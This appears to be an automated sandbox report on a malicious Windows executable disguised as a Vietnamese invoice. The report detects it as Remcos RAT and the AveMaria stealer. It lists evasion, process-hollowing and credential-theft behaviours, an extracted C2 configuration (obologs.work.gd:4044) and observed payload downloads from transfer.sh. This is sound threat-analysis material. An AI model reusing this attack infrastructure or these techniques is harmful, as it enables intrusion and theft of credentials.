Windows Analysis Report
Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Overview

General Information

Sample Name: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Analysis ID: 778240
MD5: a07407fce937593044ad512f4a6d7a1e
SHA1: 6fc304eb3856198c1f8b1da8c4a3a52c657274c7
SHA256: 770a25e30c2f095a09570447fd3ab6ecb78de00185d39035a1b87b1d7de89f8c
Tags: exe

Detection

Remcos, AveMaria
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Remcos
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Creates processes with suspicious names
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports

Classification

AV Detection

Source: obologs.work.gd Avira URL Cloud: Label: phishing
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe ReversingLabs: Detection: 27%
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Virustotal: Detection: 30% Perma Link
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: obologs.work.gd Virustotal: Detection: 14% Perma Link
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Joe Sandbox ML: detected
Source: 12.0.aspnet_compiler.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "obologs.work.gd:4044:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-E9KXT7", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49706 version: TLS 1.2
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 12_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10006580 FindFirstFileExA, 12_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW, 14_2_0040AE51

Networking

Source: unknown DNS query: name: ip-api.com
Source: unknown DNS query: name: icanhazip.com
Source: unknown DNS query: name: icanhazip.com
Source: Malware configuration extractor URLs: obologs.work.gd
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1Host: kpf0yw.am.files.1drv.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /get/J59PTO/Cuhcxlcg.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: transfer.shConnection: Keep-Alive
Source: Joe Sandbox View ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View IP Address: 13.107.43.12 13.107.43.12
Source: Joe Sandbox View IP Address: 194.5.98.244 194.5.98.244
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 194.5.98.244:4044
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: bhv8995.tmp.39.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: aspnet_compiler.exe, 0000000C.00000003.360263482.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.357358743.0000000003E51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globals
Source: aspnet_compiler.exe, 0000000C.00000003.360263482.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.360708645.0000000003E02000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.357358743.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.480125724.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.563713408.0000000006E90000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.529750715.0000000000884000.00000004.00000020.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: aspnet_compiler.exe, 0000000C.00000003.477736669.0000000004001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.549304612.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.549295120.0000000003618000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546989270.0000000003577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
